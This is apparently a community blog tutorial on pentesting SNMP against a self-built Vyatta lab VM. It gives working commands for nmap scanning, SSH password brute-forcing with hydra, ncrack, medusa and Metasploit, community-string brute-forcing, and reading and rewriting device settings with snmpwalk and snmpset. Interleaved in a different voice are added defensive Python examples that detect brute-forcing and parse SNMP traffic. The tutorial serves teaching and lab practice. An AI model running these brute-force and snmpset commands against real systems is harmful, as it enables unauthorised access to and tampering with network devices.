
SNMP Pentesting

nikki

    May 7, 2020 at 8:23 am


    hi there, this is nikhil

    in this post i am gonna explain how to pentest the snmp protocol

    i assume you know the basics of the snmp protocol

    if you don't

    then i have these links for you where you can get a better understanding of the SNMP protocol

    even if you know it, i suggest you take the time and read them, it helps with revision



    i assume you have already set up kali linux on your hyper-v

    if you don't have kali linux set up

    there are many youtube tutorials on how to set up kali linux in a virtualization environment

    even i have made a tutorial on youtube

    i hope you are ready with kali linux

    we need to simulate our snmp service

    for that we use a router called ‘vyatta’

    Download here

    Load it into VMware or VirtualBox

    Start the VM


    it boots

    it has booted in live mode

    it asks for credentials

    default credentials are



    after login we need to install vyatta on the hard disk

    for that type this on the command line

    $ install image

    then hit Enter

    it asks you for basic info like

    for almost all options you hit enter (default)


    now for the above option write Yes and then hit enter

    now it asks for a password

    set your favourite or set the default ‘vyatta’


    now start vyatta vm

    we need to enable some services on our vyatta in order to start pentesting


    you can see your shell prompt is in ‘$’



    type configure to enter configuration mode

    and enter

    set service ssh

    we have enabled ssh and we need to commit and save our changes

    for that type

    commit

    save

    now we need to set an ip address for our vm, type

    (i assume you are still in config mode)

    set interfaces ethernet eth0 address

    now hit enter

    you can check the ip address by typing

    show interfaces

    try to ping from vyatta (in my case) to kali linux (in my case)


    full view of my network

    i set it up using the gns3 simulator

    don't worry, it works even in a simple vmware setup


    we will set up ssh (already done), telnet, https and snmp

    the syntax will be similar

    set service service-type

    here snmp community strings are like passwords

    i set them as ‘public’ and ‘private’ because out of the box devices come with those strings and netadmins forget to change the default strings

    our setup is almost complete, and if we need to configure anything else

    (if i forgot something) we do that later


    now let's do a basic nmap scan against my vyatta –

    nmap -sV -n

    -sV for version scanning

    -n to skip dns name lookup, we deal with ips only lol

    we got some info about the services that are running on vyatta

    but where is snmp?

    it's a udp protocol

    by default nmap scans tcp ports

    and a lot of pentesters forget about udp scanning

    so let's scan with the -sU option

    it took me a lot of time to scan

    as we know the snmp service is running, let's directly scan the snmp ports

    161 and 162

    161 is for the nms to send queries to agents

    and 162 is for agents to contact or inform the nms (traps)

    nmap -sV -n -sU -p161,162

    -sU for scanning udp ports

    -p for specifying the ports you are interested in

    as we can see port 161 is open and running SNMPv1

    let's run nmap's inbuilt scripts with the -sC option

    nmap -sV -n -sU -p161 -sC

    -sC to use the default nmap scripts

    we got a ton of information about the device because the nmap scripts used the default community strings of snmp, which are ‘public’ and ‘private’

    take a look and try to understand the different things

    small exercise for you:

    change those default strings and run the nmap scripts again

    now notice the output


    now we set up a user on vyatta and try to bruteforce the login credentials

    log on to vyatta and type configure to enter configuration mode

    now type

    set system login user admin authentication plaintext-password aaaa

    now commit and save

    now we have to generate our wordlist

    let's generate a simple wordlist

    we use crunch to generate our wordlist

    crunch 4 4 abcd > wordlist

    we use some tools to bruteforce the ssh login


    type this command to bruteforce

    hydra -l admin -P wordlist ssh

    -l for username

    -L for a list of usernames

    -p for password

    -P for a list of passwords

    wordlist: my wordlist

    ssh: the protocol i want to bruteforce

    as you can see hydra successfully found the password ‘aaaa’


    type this syntax

    ncrack -v -T 5 --user admin -P wordlist

    -v for verbose, that means we can see what's happening

    -T 5 use 5 threads

    --user for username

    you did not see the password in the output

    you think it failed, right?

    yeah it failed

    but i can run it again and show when it succeeds

    but what i want is

    you need to understand that some tools fail at some time

    so don't always rely on one tool

    learn more tools and how they work, and if time permits learn python and write your own scripts


    type this syntax

    medusa -h -u admin -P wordlist -M ssh

    -h for host

    -u for username

    -P for a list of passwords

    -M for the module you want to execute

    if you want to know what modules medusa supports


    medusa -d

    medusa succeeded


    heres my best friend metasploit

    i love metasploit more than my girlfriend(who doesnot exist)

    first we need to set up the database to make metasploit searches faster and also to store results

    service postgresql start

    and then type


    the following screen shows up

    now to brute force ssh

    we need to search for ‘ssh_login’

    it's a module that's inbuilt in metasploit

    after typing

    search ssh_login

    we gonna use the first one

    for that we need to use ‘use’

    type this

    use auxiliary/scanner/ssh/ssh_login

    now you get this

    after that type

    show options

    now you get

    so much output

    don't worry

    take time to understand what that is

    those are the parameters required to bruteforce

    we gonna use the main ones

    we gonna set rhosts to our vyatta vm

    set rhosts

    and the username to admin

    set username admin

    and pass_file to our wordlist path

    set pass_file /root/Desktop/wordlist

    set stop_on_success true

    type run and hit enter

    the successful password is ‘aaaa’

    and you can also notice that a command shell is opened

    now you can interact with that shell

    type exit to exit out of the session
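hydra, ncrack, medusa and the ssh_login module all leave the same footprint on the target's auth log: a burst of "Failed password" entries from one source, sometimes followed by an "Accepted password" once the wordlist hits. The detector below is an added example, not code from the original post or from any of those tools; the log lines, hostname, IPs and PIDs are constructed, and the threshold of 5 failures inside 60 seconds is an assumed tuning value.

```python
"""Detect SSH password guessing in sshd syslog lines (added example, constructed data)."""
import re
from collections import defaultdict
from datetime import datetime

# One pattern for both outcomes; 'invalid user' appears when the account does not exist.
AUTH_LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2$"
)

# Constructed sample log: 192.0.2.10 runs a small wordlist against 'admin' and lands
# on the password, 198.51.100.7 fails twice, 10.0.0.2 logs in cleanly.
SAMPLE_LOG = """\
May  7 08:20:01 vyatta sshd[1201]: Failed password for admin from 192.0.2.10 port 51002 ssh2
May  7 08:20:02 vyatta sshd[1203]: Failed password for admin from 192.0.2.10 port 51003 ssh2
May  7 08:20:02 vyatta sshd[1205]: Failed password for invalid user root from 198.51.100.7 port 40001 ssh2
May  7 08:20:03 vyatta sshd[1207]: Failed password for admin from 192.0.2.10 port 51004 ssh2
May  7 08:20:04 vyatta sshd[1209]: Failed password for admin from 192.0.2.10 port 51005 ssh2
May  7 08:20:05 vyatta sshd[1211]: Failed password for admin from 192.0.2.10 port 51006 ssh2
May  7 08:20:05 vyatta sshd[1213]: Accepted password for vyatta from 10.0.0.2 port 60001 ssh2
May  7 08:20:06 vyatta sshd[1215]: Failed password for admin from 192.0.2.10 port 51007 ssh2
May  7 08:20:06 vyatta sshd[1217]: Failed password for invalid user root from 198.51.100.7 port 40002 ssh2
May  7 08:20:07 vyatta sshd[1219]: Accepted password for admin from 192.0.2.10 port 51008 ssh2
"""


def parse_auth_line(line):
    """Return (timestamp, outcome, user, ip), or None for lines that are not auth events."""
    m = AUTH_LINE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; relative spacing is all the detector needs
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
    return ts, m["outcome"], m["user"], m["ip"]


def _trim(window, now, seconds):
    """Drop failure timestamps that fell out of the sliding window."""
    while window and (now - window[0]).total_seconds() > seconds:
        window.pop(0)


def detect_password_guessing(lines, threshold=5, window_seconds=60):
    """Alert once per source that reaches `threshold` failures inside the window,
    and raise a second, more severe alert if that source then authenticates."""
    failures = defaultdict(list)  # ip -> timestamps of recent failures
    alerts, already_flagged = [], set()
    for line in lines:
        event = parse_auth_line(line)
        if event is None:
            continue
        ts, outcome, user, ip = event
        window = failures[ip]
        _trim(window, ts, window_seconds)
        if outcome == "Failed":
            window.append(ts)
            if len(window) >= threshold and ip not in already_flagged:
                already_flagged.add(ip)
                alerts.append({"ip": ip, "type": "password-guessing", "failures": len(window)})
        elif window:  # Accepted right after a run of failures: a guess succeeded
            alerts.append({"ip": ip, "type": "success-after-failures",
                           "user": user, "failures": len(window)})
    return alerts


if __name__ == "__main__":
    for alert in detect_password_guessing(SAMPLE_LOG.splitlines()):
        print(alert)
```

The "success-after-failures" alert is the one worth paging on: a noisy scanner that never gets in is a different problem from a wordlist that contained the real password, and only the log, not the attacking tool, tells a defender which case occurred.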


    first let's delete our public and private community strings


    delete service snmp community public

    delete service snmp community private

    and i set ‘bbbb’ as the ro string and ‘cccc’ as the rw string


    before we used -sC to use nmap's default scripts

    now we use the snmp-brute script to bruteforce the snmp strings

    type this

    nmap -sU -p 161 -n --script snmp-brute --script-args snmp-brute.communitiesdb=/root/Desktop/wordlist


    we got the snmp community strings ‘bbbb’ and ‘cccc’


    metasploit be like: you can't live without me! where did that bring you? BACK 2 ME

    now we use the snmp_login module for bruteforcing

    search snmp_login

    use auxiliary/scanner/snmp/snmp_login

    now guess what we type?


    show options

    as you can see, a bunch of stuff similar to when we used the ssh_login module

    in this also we only use the main ones

    set rhosts

    set pass_file /root/Desktop/wordlist

    set stop_on_success true

    i think these are the main ones

    you can customize it yourself

    i suggest you set threads to 10

    it's gonna be slow if you don't set it

    it's gonna take a really long time

    now i reduced the wordlist and ran it again


    similar syntax to that of ssh

    medusa -h -u admin -P wordlist1 -M snmp

    medusa also succeeded


    onesixtyone is also a tool used to bruteforce snmp community strings

    as the name says, 161 is the port of snmp, hence the name

    onesixtyone -c wordlist

    got the community strings as expected
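Community strings behave like passwords because SNMPv1/v2c sends them in clear text in every datagram, and the brute-force runs above (nmap snmp-brute, snmp_login, medusa, onesixtyone) all look the same on the wire: one source sending a different string in each request. The parser and detector below are an added example, not code from the original post or from any of those tools; the datagrams, IP addresses and the threshold of 5 distinct strings per source are constructed or assumed values.

```python
"""Parse SNMPv1/v2c message headers and flag weak or brute-forced community strings.

Added example. An SNMP message is BER-encoded as
SEQUENCE { version INTEGER, community OCTET STRING, pdu }, so the community
string is readable by anything that sees the UDP/161 datagram.
"""
from collections import defaultdict

DEFAULT_COMMUNITIES = {"public", "private"}
VERSION_NAMES = {0: "SNMPv1", 1: "SNMPv2c", 3: "SNMPv3"}


def _read_tlv(data, pos):
    """Read one BER tag-length-value starting at pos; return (tag, value, next_pos)."""
    if pos + 2 > len(data):
        raise ValueError("truncated TLV header")
    tag, length, pos = data[pos], data[pos + 1], pos + 2
    if length & 0x80:  # long form: low 7 bits give the number of length octets
        n = length & 0x7F
        if n == 0 or pos + n > len(data):
            raise ValueError("bad long-form length")
        length = int.from_bytes(data[pos:pos + n], "big")
        pos += n
    if pos + length > len(data):
        raise ValueError("value runs past end of datagram")
    return tag, data[pos:pos + length], pos + length


def parse_snmp_header(datagram):
    """Return (version_name, community). Community is None for SNMPv3,
    which replaces the community string with a user-based security header."""
    tag, body, _ = _read_tlv(datagram, 0)
    if tag != 0x30:
        raise ValueError("SNMP message must start with a SEQUENCE")
    tag, raw_version, pos = _read_tlv(body, 0)
    if tag != 0x02:
        raise ValueError("expected INTEGER version")
    version = int.from_bytes(raw_version, "big", signed=True)
    name = VERSION_NAMES.get(version, f"unknown({version})")
    if version == 3:
        return name, None
    tag, community, _ = _read_tlv(body, pos)
    if tag != 0x04:
        raise ValueError("expected OCTET STRING community")
    return name, community.decode("latin-1")


def _tlv(tag, value):
    """Short-form BER encoder, enough for the small sample datagrams below."""
    if len(value) >= 128:
        raise ValueError("sample encoder only handles short-form lengths")
    return bytes([tag, len(value)]) + value


def build_get_request(community, version=0, request_id=1):
    """Constructed sample datagram: a GetRequest for sysName.0 (1.3.6.1.2.1.1.5.0)."""
    sys_name = bytes.fromhex("06082b06010201010500")            # OID, pre-encoded
    varbinds = _tlv(0x30, _tlv(0x30, sys_name + b"\x05\x00"))   # value is NULL in a request
    pdu = _tlv(0xA0, _tlv(0x02, bytes([request_id]))            # GetRequest-PDU
               + b"\x02\x01\x00" + b"\x02\x01\x00" + varbinds)  # error-status, error-index
    return _tlv(0x30, b"\x02\x01" + bytes([version]) + _tlv(0x04, community.encode()) + pdu)


def triage(datagrams, brute_threshold=5):
    """datagrams: iterable of (source_ip, raw_bytes). Reports default strings,
    sources cycling through many distinct strings, and datagrams that were not SNMP."""
    default_hits, strings_per_source, unparsable = [], defaultdict(set), 0
    for src, raw in datagrams:
        try:
            version, community = parse_snmp_header(raw)
        except ValueError:
            unparsable += 1
            continue
        if community is None:
            continue
        strings_per_source[src].add(community)
        if community in DEFAULT_COMMUNITIES:
            default_hits.append((src, version, community))
    brute = sorted(src for src, seen in strings_per_source.items() if len(seen) >= brute_threshold)
    return {"default_community": default_hits, "brute_force_sources": brute, "unparsable": unparsable}


# Constructed traffic: a monitoring host still using the factory string, one host
# walking through a wordlist, and one stray non-SNMP datagram.
SAMPLE_TRAFFIC = (
    [("10.0.0.5", build_get_request("public"))]
    + [("10.0.0.9", build_get_request(w)) for w in ("aaaa", "aaab", "aaac", "aaad", "aaae", "bbbb")]
    + [("10.0.0.5", build_get_request("n3tm0n-ro", version=1)), ("10.0.0.7", b"\x00\x01not snmp")]
)

if __name__ == "__main__":
    print(triage(SAMPLE_TRAFFIC))
```

The same header parse is what makes the "small exercise" earlier meaningful: once the default strings are gone, a default-string hit in triage() is no longer a monitoring host but someone guessing, and the distinct-strings-per-source count catches the guessing even when none of the guesses are on the default list. Moving the agent to SNMPv3 removes the clear-text string from the datagram entirely, which is why parse_snmp_header() returns None for it.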


    ok we got the community strings, now what?

    we can read and get to know the configuration of the network and also other information that is stored in that router

    let's get started


    this tool (snmpwalk) walks along the OID tree using get-next requests and gets all the info you need

    snmpwalk -v1 -c bbbb

    -v1 is the snmp version number

    -c is the community string

    you get a ton of information

    ok what is this information?

    all the information is stored in objects and it's accessed using numbers (OIDs)

    you can copy paste any oid and check here

    ok can we modify the value?

    yes, because we have the rw string, which is ‘cccc’

    ok how can we modify it?

    we use


    ok let's modify the vyatta name and its oid is


    snmpset -v1 -c cccc iso. s hacked

    s for string notation

    it's saying that the value changed

    let's check by running snmpwalk again

    snmpwalk -v1 -c bbbb | head -10

    the head command gives only the first 10 lines of output

    as you can see our ‘vyatta’ string has changed into ‘hacked’

    you may find that with snmpwalk we get the output in oid format and we need a conversion, like what ip address it's using, sys configuration etc

    for that we have


    snmpcheck -c cccc -t

    -t for specifying the target

    you can now understand the output more easily than snmpwalk's


    again huh?

    hell yeah

    there are some snmp post exploitation modules in order to get information


    search snmp_enum

    now as usual type

    show options

    set community cccc

    set rhosts


    you get a lot of output showing sys information, running processes and so much more


    as the name implies, this module modifies the oid values like the snmpset command does

    as normal

    search snmp_set

    use path_to_snmp_set

    show options

    set rhosts

    set community cccc

    set oid iso.


    now you get an error because of the ‘iso’ in our oid string

    we need to convert it into a number

    as we know the value of iso is 1 (top of the tree)

    set oid

    set oidvalue value_you_want_to_set


    we check using the snmpwalk command


    there is a tool to convert oid strings to values

    we need to find the oid number of ‘iso’

    we can use


    snmptranslate -On iso.
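The snmp_set error above comes from the textual "iso" prefix, which the module does not resolve; snmptranslate -On does that from MIB files. The block below is an added example, not code from the original post or from Net-SNMP: it resolves a small assumed table of named nodes (iso = 1 plus a few MIB-2 names) to numeric form, and shows the BER encoding of the numeric OID that every snmpget, snmpset and snmpwalk request actually carries, including the 40*X+Y packing of the first two arcs and the base-128 sub-identifiers. It also covers the snmpwalk output earlier, which prints OIDs in exactly this "iso.3.6.1..." form.

```python
"""Translate textual OIDs to numeric form and encode/decode them in BER (added example)."""

# Well-known named nodes and their numeric prefixes: an assumed small subset of
# what snmptranslate loads from MIB files.
NAMED_PREFIXES = {
    "iso": "1",
    "internet": "1.3.6.1",
    "mgmt": "1.3.6.1.2",
    "mib-2": "1.3.6.1.2.1",
    "system": "1.3.6.1.2.1.1",
    "sysDescr": "1.3.6.1.2.1.1.1",
    "sysName": "1.3.6.1.2.1.1.5",
    "enterprises": "1.3.6.1.4.1",
}


def to_numeric(oid_text):
    """'iso.3.6.1.2.1.1.5.0' or 'SNMPv2-MIB::sysName.0' -> '1.3.6.1.2.1.1.5.0'."""
    if "::" in oid_text:
        oid_text = oid_text.split("::", 1)[1]  # drop the MIB module qualifier
    parts = oid_text.strip(".").split(".")
    if parts[0] in NAMED_PREFIXES:
        parts = NAMED_PREFIXES[parts[0]].split(".") + parts[1:]
    if not all(p.isdigit() for p in parts):
        raise ValueError(f"unresolvable OID {oid_text!r}")
    return ".".join(parts)


def encode_oid(oid_text):
    """BER-encode an OID: tag 0x06, length, then base-128 sub-identifiers.
    The first two arcs are packed into a single sub-identifier as 40*X + Y."""
    arcs = [int(p) for p in to_numeric(oid_text).split(".")]
    if len(arcs) < 2 or arcs[0] > 2 or (arcs[0] < 2 and arcs[1] > 39):
        raise ValueError("first two arcs out of range")
    subids = [arcs[0] * 40 + arcs[1]] + arcs[2:]
    body = bytearray()
    for value in subids:
        groups = [value & 0x7F]  # lowest 7 bits go last, without a continuation bit
        value >>= 7
        while value:
            groups.append((value & 0x7F) | 0x80)  # higher groups carry bit 7 set
            value >>= 7
        body.extend(reversed(groups))
    if len(body) >= 128:
        raise ValueError("long-form length not implemented in this example")
    return bytes([0x06, len(body)]) + bytes(body)


def decode_oid(encoded):
    """Inverse of encode_oid; returns the dotted numeric string."""
    if len(encoded) < 2 or encoded[0] != 0x06:
        raise ValueError("not an OBJECT IDENTIFIER")
    length = encoded[1]
    if length & 0x80 or len(encoded) != 2 + length:
        raise ValueError("unexpected length")
    body = encoded[2:]
    if not body or body[-1] & 0x80:
        raise ValueError("empty or truncated OID body")
    subids, current = [], 0
    for octet in body:
        current = (current << 7) | (octet & 0x7F)
        if not octet & 0x80:  # last group of this sub-identifier
            subids.append(current)
            current = 0
    first = subids[0]
    arcs = [first // 40, first % 40] if first < 80 else [2, first - 80]
    return ".".join(str(a) for a in arcs + subids[1:])


if __name__ == "__main__":
    for text in ("iso.3.6.1.2.1.1.5.0", "SNMPv2-MIB::sysName.0", "enterprises.2021"):
        numeric = to_numeric(text)
        print(text, "->", numeric, "->", encode_oid(numeric).hex())
```

The sysName.0 OID encodes to 06 08 2b 06 01 02 01 01 05 00: the 2b is 40*1+3 for "1.3", which is why the named root cannot simply be dropped or left as text when a tool expects the numeric form.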

    sorry, only 2 photos are showing

    i hope you understand it better when you do this practically

SECARMY - Security and Research Community